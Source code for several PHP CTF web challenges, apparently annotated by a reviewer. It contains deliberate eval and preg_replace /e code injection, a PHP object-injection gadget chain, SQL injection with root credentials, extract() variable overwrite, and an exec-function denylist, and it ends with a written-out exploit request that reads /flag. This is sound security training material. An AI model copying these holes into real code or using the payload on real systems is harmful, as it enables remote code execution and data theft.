数条CTF题目

evilecho

index.php

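<?php

// CTF challenge source (evilecho): request data reaches eval(). The logic is kept as
// published; syntax-highlighter markup has been removed so the listing is valid PHP,
// and the comments mark what a reviewer would flag.

echo "<h2>Tips: eval & echo = ?</h2>";

// HTTP_HOST comes from the client's Host header, so $hostname and $port are
// client-controlled. When the header carries no ":port", explode() returns a single
// element and $port is left unset.
$hostHeader = $_SERVER['HTTP_HOST'];
list($hostname, $port) = explode(':', $hostHeader);

// The "file" query parameter is appended to "./images/" without any validation.
$image = isset($_GET["file"]) ? "./images/" . $_GET["file"] : "";

if ($image == "") {
    // Output has already started (the echo above), so this header may not be sent
    // unless output buffering is enabled. There is no exit after it, so execution
    // continues to eval() below. The redirect target is built from the Host header.
    header("Location: " . "http://$hostname:$port" . "/index.php?file=eason.jpg");
}

// $file is PHP source text with $image spliced inside a single-quoted literal.
// Nothing escapes quote characters in $image, so the parameter value becomes part of
// the code that eval() runs.
$file = "echo '<img src=\"" . $image . "\" width=200px height=auto>';";

// in_array() compares the whole lower-cased path with each list entry. $image is either
// "" or starts with "./images/", so it can never equal one of these words: the check
// never fires. It is an equality test, not a substring filter.
if (in_array(strtolower($image), array("cat", " ", "flag", "docker", "shell_exec", "exec", "popen"))) {
    exit("Hacker!!!!");
}

// NOTE(review): eval() on a string that contains request data is code injection.
// A safe version needs no eval at all: restrict the name to an allowlist (or basename()
// plus an extension check) and print the tag with htmlspecialchars($image, ENT_QUOTES).
eval ($file);

?>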

happy

index.php

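 <?php
// CTF challenge source (happy). The page prints its own source to every visitor.
highlight_file(__FILE__);
// All error reporting is switched off, so failures in the code below are silent.
error_reporting(0);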

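/**
 * Holds a callable and one argument, and invokes them whenever an undefined
 * method is called on the object.
 *
 * NOTE(review): both properties are public and unvalidated. If an instance is
 * created by unserialize() on request data (as the bottom of this file does),
 * the caller of the page chooses which function runs and with what argument.
 */
class hahaha
{
    /** @var mixed Callable passed as the first argument of call_user_func(). */
    public $cmd;
    /** @var mixed Single argument handed to that callable. */
    public $content;

    /**
     * @param mixed $cmd     Callable to store.
     * @param mixed $content Argument to store.
     */
    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    /**
     * Runs for any call to a method this class does not define.
     *
     * The method name and its arguments are ignored; the stored callable is invoked
     * with the stored argument and its return value is discarded.
     *
     * @param string $name      Name of the undefined method (unused).
     * @param array  $arguments Arguments of that call (unused).
     */
    public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }

}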

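/**
 * Callable object that forwards to check() on whatever $happiness holds.
 *
 * NOTE(review): $happiness is public and untyped, so the class of the object that
 * receives the check() call is decided by whoever populated the property.
 */
class Nevv
{
    /** @var mixed Object on which check() is called. */
    public $happiness;

    /**
     * Runs when the object itself is used as a function.
     *
     * @return mixed Whatever $this->happiness->check() returns.
     */
    public function __invoke()
    {
        return $this->happiness->check();
    }

}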

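/**
 * Object whose undefined-property writes read a property of another object.
 *
 * NOTE(review): $aspiration is public and untyped; the property read in __set()
 * happens on whatever object was placed there.
 */
class Rabbit
{
    /** @var mixed Object whose "family" property is read by __set(). */
    public $aspiration;

    /**
     * Runs when a property this class does not declare is assigned.
     *
     * The assigned name and value are not stored. The method only reads
     * $this->aspiration->family; PHP ignores the value returned from __set().
     *
     * @param string $name Property being assigned (unused).
     * @param mixed  $val  Value being assigned (unused).
     */
    public function __set($name, $val)
    {
        return $this->aspiration->family;
    }
}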

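/**
 * Object with a destructor that either prints a greeting or assigns a property
 * on $rabbit, depending on $key.
 *
 * NOTE(review): __destruct() runs for every instance when it is destroyed, which
 * includes instances created by unserialize(). With public, untyped properties the
 * destructor operates on values chosen by whoever supplied the serialized data.
 */
class Year
{
    /** @var mixed Compared with "come on" in the destructor. */
    public $key;
    /** @var mixed Target of the property write in firecrackers(); invoked as a callable in __get(). */
    public $rabbit;

    /**
     * @param mixed $key Value stored in $key. Not run by unserialize().
     */
    public function __construct($key)
    {
        $this->key = $key;
    }

    /**
     * Assigns the string "allkill QAQ" to the "wish" property of $rabbit.
     *
     * @return mixed Result of the assignment expression.
     */
    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    /**
     * Runs when a property this class does not declare is read.
     *
     * The requested name is discarded; $rabbit is called as a function and nothing
     * is returned.
     *
     * @param string $name Property being read (overwritten immediately).
     */
    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }

    /**
     * Calls firecrackers() when $key loosely equals "come on", otherwise prints a
     * greeting. The comparison uses ==, not ===.
     */
    public function __destruct()
    {
        if ($this->key == "come on") {
            $this->firecrackers();
        } else {
            print ("Welcome 2025!!!!!");
        }
    }
}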

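// NOTE(review): unserialize() on a request parameter is PHP object injection. The
// caller decides which of the classes above are instantiated and what their public
// properties hold, and their magic methods (__destruct, __set, __get, __invoke,
// __call) then run without any explicit call in this script.
// Production code would accept JSON (json_decode) instead, or at minimum pass
// ['allowed_classes' => false] as the second argument so no objects are created.
if (isset($_GET['poc'])) {
    $a = unserialize($_GET['poc']);
} else {
    echo "come on";
}


?>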

issql

index.php

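<html xmlns="http://www.w3.org/1999/xhtml">
<!--This set of source code is made by MS. -->
<!--Date 2018.12.13-->
    <head>
        <meta http-equiv=Content-Type content="text/html;charset=utf-8">
        <meta name="description" content="Test">
        <meta name="author" content="MRYE+">
        <title>电脑信息查询 - 网络安全工作室</title>
        <link rel="stylesheet" type="text/css" href="./css/ctf.css" />
    </style>
</head>
<body>
<div class="container">
  <div id="search">
    <label for="search">输入以1、2、3显示电脑信息</label>
    <form id="myForm" action="" method="post">
    <input type="text" id="ms" name="ms"maxlength="1">
    <input class="button" type="submit" value="Search">
    </form>
<?php
// CTF challenge source (issql): a lookup page that builds its SQL by string
// interpolation. The logic is kept as published; the comments mark what a reviewer
// would flag.
// NOTE(review): the mysql_* functions used here were removed in PHP 7.0; current code
// would use PDO or mysqli.

// Disable error reporting
error_reporting(0);
// The HTML above has already been output at this point, so this header may not be
// sent unless output buffering is enabled; the <meta> tag already declares the charset.
header("Content-Type: text/html;charset=utf-8");
require_once './suxinctf.php';

if (isset($_POST["ms"]))
{
    $ID = $_POST["ms"];
    #echo $ID;
    // NOTE(review): $ID is placed inside the quoted SQL literal with no escaping and no
    // type check. The maxlength="1" on the form field is enforced only by the browser,
    // not by the server. Production code would validate the id as an integer and bind
    // it through a prepared statement.
    $query = "select * from goods where id='{$ID}'"; // build the query
    $result = mysql_query($query); // run the query
    if (!$result) {
        // NOTE(review): the raw database error text is returned to the client.
        die("could not to the database\n" . mysql_error());
    }
    if (mysql_numrows($result)<=0) {
        echo "<script     type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>";
    } else {
        while ($result_row = mysql_fetch_row(($result))) // fetch the rows and display them
        {
            $ms = $result_row[0];
            $gname = $result_row[1];
            $gprice = $result_row[2];
            $gnum = $result_row[3];
            // NOTE(review): column values are written into the page without
            // htmlspecialchars(), so any markup stored in the table is rendered as-is.
            echo "<font color='red'>电脑编号为:".$ms."  </font> ";
            echo "<font color='red'>电脑系统为:".$gname."  </font>";
            echo "<font color='red'>电脑价格为:".$gprice."  </font>";
            echo "<font color='red'>电脑数量为:".$gnum."  </font>";
        }
    }
}

// Second query: runs on every request and selects the whole table. The rows are
// fetched into $ms and $gname but nothing is printed from them.
$query = "select * from goods "; // build the query
$result = mysql_query($query); // run the query
if (!$result) {
    die("could not to the database\n" . mysql_error());
}
if (mysql_numrows($result)<=0) {
    echo "<script     type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>";
} else {
    while ($result_row = mysql_fetch_row(($result))) // fetch the rows
    {
        $ms = $result_row[0];
        $gname = $result_row[1];
    }

    // The connection is closed only on this branch, i.e. when the table has rows.
    mysql_close($connection); // close the connection
}
?>
  </div>
</div>
</body>
</html>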

suxinctf.php

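<?php
// Database bootstrap for the issql challenge; index.php loads it with require_once.
// NOTE(review): the mysql_* extension was removed in PHP 7.0; current code would use
// PDO or mysqli.
$host = 'localhost';
$database = 'ctf';
// NOTE(review): the application connects as root with an empty password, and the
// credentials are hard-coded in the source. Any query flaw in a page that includes
// this file then runs with the full privileges of that account. A dedicated
// least-privilege database user, with its secret loaded from configuration outside
// the web root, limits the impact.
$username = 'root';
$password = '';
$connection = mysql_connect($host, $username, $password); // connect to the database server
if (!$connection) {
    // NOTE(review): the raw driver error is sent to the client.
    die("could not connect to the database.\n" . mysql_error()); // report the connection error
}
// Set the connection character set only after the connection is known to be valid
// (the original issued this query before checking $connection).
mysql_query("set names 'utf8'");
$selectedDb = mysql_select_db($database); // select the database
if (!$selectedDb) {
    die("could not to the database\n" . mysql_error());
}
?>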

ezphp

register.php

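<?php
    // CTF challenge source (ezphp, register.php): stores a new user as an XML record.
    // The logic is kept as published; the comments mark what a reviewer would flag.
    // is_user_exists() and register_user() come from utils/function.php, which is not
    // shown on this page.
    include "utils/function.php";
    $config = include "utils/config.php";
    $user_xml_format = "<?xml version='1.0'?>
                        <userinfo>
                            <user>
                                <username>%s</username>
                                <password>%s</password>
                            </user>
                        </userinfo>";
    // NOTE(review): extract() on $_REQUEST turns every request parameter into a local
    // variable and, with the default flags, overwrites variables that already exist.
    // $config and $user_xml_format are both defined above this call, so a request can
    // replace them. Read the two expected fields explicitly instead, as login.php does.
    extract($_REQUEST);
    if(empty($username)||empty($password)) die("Username or password cannot be empty XD");

    // Only the username is validated. In PCRE, "$" also matches just before a final
    // newline; "\z" or the D modifier anchors at the true end of the string.
    if(!preg_match('/^[a-zA-Z0-9_]+$/', $username)) die("Invalid username. :(");

    if(is_user_exists($username, $config["user_info_dir"])) die("User already exists XD");
    // NOTE(review): $password is written into the XML text without escaping, so markup
    // characters in it change the structure of the stored document. It is also stored
    // in clear text. Production code would store password_hash() output and escape
    // values with htmlspecialchars($value, ENT_XML1 | ENT_QUOTES), or build the
    // document with an XML writer.
    $user_xml = sprintf($user_xml_format, $username, $password);

    register_user($username, $config['user_info_dir'], $user_xml);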

login.php

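<?php
    // CTF challenge source (ezphp, login.php): checks a username/password pair against
    // the stored user record. The logic is kept as published; the comments mark what a
    // reviewer would flag. is_user_exists() and get_user_record() come from
    // utils/function.php, which is not shown on this page.
    include "utils/function.php";
    $config = include  "utils/config.php";
    $username = $_REQUEST['username'];
    $password = $_REQUEST['password'];
    if(empty($username)||empty($password)) die("Username or password cannot be empty XD");
    // NOTE(review): unlike register.php, the username is not checked against
    // /^[a-zA-Z0-9_]+$/ before it is passed to the helpers together with a directory.
    // How the helpers use it is not visible here; confirm they cannot be steered
    // outside user_info_dir.
    // Separate "Username error" and "Password error" replies also tell a caller which
    // usernames exist.
    if(!is_user_exists($username, $config["user_info_dir"])) die("Username error");
    // NOTE(review): the record looks like a parsed XML document (->user->password).
    // The parser settings live in get_user_record(); confirm that external entity
    // loading is disabled there, since the stored XML contains user-supplied text.
    $user_record = get_user_record($username, $config['user_info_dir']);
    // NOTE(review): plaintext password compared with the loose != operator. Production
    // code would store a hash and use password_verify(). The error message also echoes
    // a value read from the stored record without HTML escaping.
    if($user_record->user->password != $password) die("Password error for User:".$user_record->user->username);
    // No session or other login state is set in this file before the redirect.
    header("Location:main.html");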

crackme

index.php

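<?php
// CTF challenge source (crackme): request data is used as the replacement of a
// preg_replace() call with the /e modifier. The logic is kept as published; the
// comments mark what a reviewer would flag.
if ($_GET['crack'] === 'flag') {
    highlight_file(__FILE__);
    if (isset($_POST['hk']) && isset($_POST['flag'])) {
        $str1 = $_POST['hk'];
        $str2 = $_POST['flag'];
        // Denylist on the replacement text, a fixed length of 19 for the subject, and a
        // check that the subject does not contain "give_me_flag".
        // NOTE(review): a denylist of function names cannot enumerate every way to
        // express code. The subject check is also case-sensitive, while the replacement
        // pattern below uses /i, so the two disagree on what counts as a match.
        if (preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i', $str1) || strlen($str2) != 19 || preg_match('/give_me_flag/', $str2)) {
            die('hacker!');
        } else {
            // NOTE(review): with the /e modifier the replacement string is evaluated as
            // PHP code for every match, and here the replacement is request data. /e was
            // deprecated in PHP 5.5 and removed in PHP 7.0. The safe form is
            // preg_replace_callback() with a fixed callback, keeping user input out of
            // any evaluated position.
            preg_replace("/give_me_flag/ei", $_POST['hk'], $_POST['flag']);
        }
    }
} else {
    echo "moran want a flag.</br>(?crack=flag)";
}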
POST ?crack=flag&a=readfile&b=/flag HTTP/1.1

hk=$_GET[a]($_GET[b])&flag=give_me_Flag/ei1111

 
